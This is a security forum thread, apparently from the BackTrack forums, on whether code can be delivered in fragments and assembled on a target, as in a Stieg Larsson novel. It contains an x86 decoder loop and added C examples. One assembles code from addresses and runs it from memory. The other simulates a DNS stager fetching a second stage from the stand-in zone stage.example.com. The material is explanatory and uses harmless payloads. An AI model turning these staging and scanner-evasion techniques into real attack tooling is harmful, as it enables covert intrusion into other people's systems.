
Thread: stieg larsson's asphyxia

  1. #1
    Join Date
    Nov 2008

    stieg larsson's asphyxia

    In the Millennium series by Stieg Larsson, a talented PC user named WASP designs and implements an app named Asphyxia. The interesting part is how the app is constructed on the remote machine by the concatenation of individual payloads. Is this possible in reality? All my knowledge in pentesting is rather limited to standard approaches. Installing a vulnerability is based on the delivery of an intact piece of code that can execute, or a single event.

    The concept of piecemeal delivery of code that is assembled remotely on the target machine seems to be a devilishly difficult exploit to guard against. How would an antivirus or malware scanning app know about code fragments?

    Getting back to the point though, does anyone have insight into this idea?

  2. #2
    Good friend of the forums
    Join Date
    Jun 2008

    Re: stieg larsson's asphyxia

    Not sure of the names it would use, but something like that is possible, e.g.
    12345678 = inc eax
    45678912 = push esp
    Say the above are instructions in the program or a DLL. If you know the address where they are, rather than having the opcodes for "inc eax" you can pass 12345678. The same can work for functions, like strcpy, socket, etc.

    e.g. decoder (x86, Intel syntax):

    ; esi = payload address: an array of 4-byte addresses, each pointing at
    ;       4 bytes of existing code in the program or a DLL
    ; edi = temp storage on r/w/x memory where the code gets assembled
    mov ecx, esp
    sub ecx, esi        ; ecx = esp - esi = bytes of payload (esp marks its end)
    shr ecx, 2          ; = number of 4-byte addresses to process
    top:
    mov eax, [esi]      ; eax = next address from the payload
    mov ebx, [eax]      ; ebx = the 4 bytes of code it points at
    mov [edi], ebx      ; append them to the assembled code
    add esi, 4          ; next address (was "inc esi", which only stepped 1 byte)
    add edi, 4          ; next free slot in the buffer
    dec ecx
    jnz top             ; loop until every address has been copied
    ; edi now points just past the assembled code; jump to its start to run it

    Another way could be to just fork to child shellcode payloads that get sent once a small network payload is sent, like what Meterpreter does: if you run a plugin it sends the shellcode and runs it.
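
    Added example (my code, not anything from the thread or from the Millennium books): the scheme in the post above, written out in C so it can be run and checked. A constructed byte array, FAKE_TEXT, stands in for the .text of a program or DLL whose contents the attacker already knows; the payload that travels to the target (PAYLOAD) is only a list of addresses into it; assemble is the decoder loop, copying 4 bytes from each address into a fresh buffer; run_assembled then, on x86-64 Linux/macOS only, maps that buffer executable and calls it (the chosen fragments assemble to "mov eax, 42; ret"). wire_contains checks whether the opcode sequence of the final code appears anywhere in the address list as it travels, which is the point the post is making about what a scanner actually gets to look at. All of these names are mine.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <string.h>
#if defined(__linux__) || defined(__APPLE__)
#include <sys/mman.h>
#endif

/* Constructed stand-in for the .text of a program or DLL already on the
   target. The attacker knows its contents (and their addresses) in advance. */
static const unsigned char FAKE_TEXT[] = {
    0x90, 0x90, 0x90, 0x90,   /* +0 : nop x4, filler                                   */
    0xb8, 0x2a, 0x00, 0x00,   /* +4 : first 4 bytes of "mov eax, 42" (b8 2a 00 00 00)  */
    0xcc, 0xcc, 0xcc, 0xcc,   /* +8 : int3 x4, never referenced                        */
    0x00, 0xc3, 0x90, 0x90,   /* +12: last byte of the mov, then ret, nop, nop         */
};

/* The only thing that has to reach the target: addresses, not opcodes.
   Each entry names 4 bytes of existing code, in the order they are wanted. */
static const unsigned char *const PAYLOAD[] = {
    FAKE_TEXT + 4,
    FAKE_TEXT + 12,
};
#define PAYLOAD_LEN (sizeof PAYLOAD / sizeof PAYLOAD[0])

/* The decoder loop from the post, in C: for every address, fetch the 4 bytes
   it points at and append them to out. Returns the number of bytes written. */
size_t assemble(const unsigned char *const *addrs, size_t n, unsigned char *out)
{
    size_t used = 0;
    for (size_t i = 0; i < n; i++) {
        memcpy(out + used, addrs[i], 4);   /* mov ebx,[eax] ; mov [edi],ebx */
        used += 4;                         /* add esi,4 ; add edi,4        */
    }
    return used;
}

/* Does the payload as it travels (the raw bytes of the address array) contain
   a given byte sequence, e.g. the opcodes of the code it will assemble? */
int wire_contains(const unsigned char *needle, size_t n)
{
    const unsigned char *wire = (const unsigned char *)PAYLOAD;
    for (size_t i = 0; i + n <= sizeof PAYLOAD; i++)
        if (memcmp(wire + i, needle, n) == 0)
            return 1;
    return 0;
}

/* Assemble the code and run it. The bytes are x86-64 "mov eax,42; ret", so it
   is only executed on x86-64 Linux/macOS; elsewhere, or if the OS refuses an
   executable mapping, -1 is returned instead. */
int run_assembled(void)
{
    unsigned char code[PAYLOAD_LEN * 4];
    size_t len = assemble(PAYLOAD, PAYLOAD_LEN, code);
#if defined(__x86_64__) && (defined(__linux__) || defined(__APPLE__))
    size_t sz = 4096;
    void *mem = mmap(NULL, sz, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;
    memcpy(mem, code, len);                               /* write while RW ... */
    if (mprotect(mem, sz, PROT_READ | PROT_EXEC) != 0) {  /* ... then flip to RX */
        munmap(mem, sz);
        return -1;
    }
    int (*fn)(void) = (int (*)(void))mem;
    int r = fn();
    munmap(mem, sz);
    return r;
#else
    (void)len;
    return -1;
#endif
}

int main(void)
{
    unsigned char code[PAYLOAD_LEN * 4];
    size_t len = assemble(PAYLOAD, PAYLOAD_LEN, code);
    printf("assembled %zu bytes:", len);
    for (size_t i = 0; i < len; i++)
        printf(" %02x", code[i]);
    printf("\nopcodes of the final code visible in the wire payload: %s\n",
           wire_contains(code, 6) ? "yes" : "no");
    printf("run_assembled() = %d\n", run_assembled());
    return 0;
}
```

    The RW-then-RX mapping is a deliberate choice over a single RWX mapping: it is what a real loader would do and it is also the step a defender can watch for, since the final code only ever exists in memory after the mprotect call, never on the wire.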

  3. #3
    Super Moderator lupin
    Join Date
    Jan 2010

    Re: stieg larsson's asphyxia

    First of all, meaningful thread names. Second, you need to sort out your use of terminology. An attacker doesn't install a vulnerability, and piecemeal delivery of code isn't an exploit, at least not in and of itself, although it could be considered to be a technique for executing code after an exploit has been used to take control of code execution on a system.

    Is the technique possible? Yes, and it's currently being used. If you want to see an example of a simple use of this, have a look at the DNS tunneling shellcode from ProjectShellcode. There is a paper by Ty Miller that explains how it retrieves second stage shellcode over DNS requests.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.
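
    Added example, not code from the thread, from ProjectShellcode or from Ty Miller's paper: a simulation in C of the staging idea lupin points at, i.e. a tiny first stage that pulls the real payload down in pieces through DNS lookups. No packets are sent. answer_query stands in for an attacker-controlled name server for the made-up zone stage.example.com and answers a lookup of <n>.stage.example.com with a TXT-style string holding chunk n of the stage in hex (or END once there is nothing left); fetch_stage is the stager, walking n = 0, 1, 2, ... until it sees END and checking the sequence number on every answer before appending the bytes. The stage contents, the chunk size, the zone name and the "<seq>:<hex>" encoding are all my own choices.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the second stage (ordinary bytes, not shellcode). */
static const unsigned char STAGE[] = "second-stage-payload-bytes-0123456789";
#define STAGE_LEN (sizeof STAGE - 1)
#define CHUNK 8   /* stage bytes per answer; kept tiny so several round trips happen */

/* Server side (hypothetical attacker name server for stage.example.com).
   A query for <seq>.stage.example.com gets the TXT-style answer
   "<seq>:<hex of chunk seq>", or "<seq>:END" once the stage is exhausted.
   Returns 0, or -1 if the name is not one it serves. */
int answer_query(const char *qname, char *txt, size_t txtlen)
{
    unsigned seq;
    if (sscanf(qname, "%u.stage.example.com", &seq) != 1)
        return -1;
    size_t off = (size_t)seq * CHUNK;
    if (off >= STAGE_LEN) {
        snprintf(txt, txtlen, "%u:END", seq);
        return 0;
    }
    size_t n = STAGE_LEN - off < CHUNK ? STAGE_LEN - off : CHUNK;
    int w = snprintf(txt, txtlen, "%u:", seq);
    for (size_t i = 0; i < n; i++)
        w += snprintf(txt + w, txtlen - w, "%02x", STAGE[off + i]);
    return 0;
}

/* Stager side: ask for chunk 0, 1, 2, ... (answer_query stands in for the
   real resolver call), insist that each answer carries the sequence number
   that was asked for, decode the hex and append it. Returns the reassembled
   length, or -1 on any inconsistency (bad name, wrong seq, bad hex, overflow). */
int fetch_stage(unsigned char *out, size_t outlen)
{
    size_t total = 0;
    for (unsigned seq = 0; ; seq++) {
        char qname[64], txt[128];
        snprintf(qname, sizeof qname, "%u.stage.example.com", seq);
        if (answer_query(qname, txt, sizeof txt) != 0)
            return -1;
        unsigned got;
        int pos = 0;
        if (sscanf(txt, "%u:%n", &got, &pos) != 1 || got != seq)
            return -1;                       /* out of order or tampered */
        if (strcmp(txt + pos, "END") == 0)
            break;                           /* last chunk already stored */
        for (const char *p = txt + pos; p[0] != '\0'; p += 2) {
            unsigned byte;
            if (p[1] == '\0' || sscanf(p, "%2x", &byte) != 1)
                return -1;                   /* odd length or non-hex */
            if (total >= outlen)
                return -1;                   /* stage larger than our buffer */
            out[total++] = (unsigned char)byte;
        }
    }
    return (int)total;
}

/* Full round trip: the stage length if what came back matches STAGE, else -1. */
int demo_roundtrip(void)
{
    unsigned char buf[256];
    int n = fetch_stage(buf, sizeof buf);
    if (n != (int)STAGE_LEN || memcmp(buf, STAGE, STAGE_LEN) != 0)
        return -1;
    return n;
}

int main(void)
{
    char txt[128];
    for (unsigned seq = 0; seq < 6; seq++) {
        char qname[64];
        snprintf(qname, sizeof qname, "%u.stage.example.com", seq);
        answer_query(qname, txt, sizeof txt);
        printf("%-24s -> TXT \"%s\"\n", qname, txt);
    }
    printf("reassembled %d bytes\n", demo_roundtrip());
    return 0;
}
```

    The sequence-number check is the part worth keeping in mind: real DNS answers can arrive cached, duplicated or out of order, and a stager that just appends whatever comes back will assemble garbage and crash rather than run the stage.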

  4. #4
    Join Date
    Mar 2007

    Re: stieg larsson's asphyxia

    This thread has nothing to do with BackTrack.
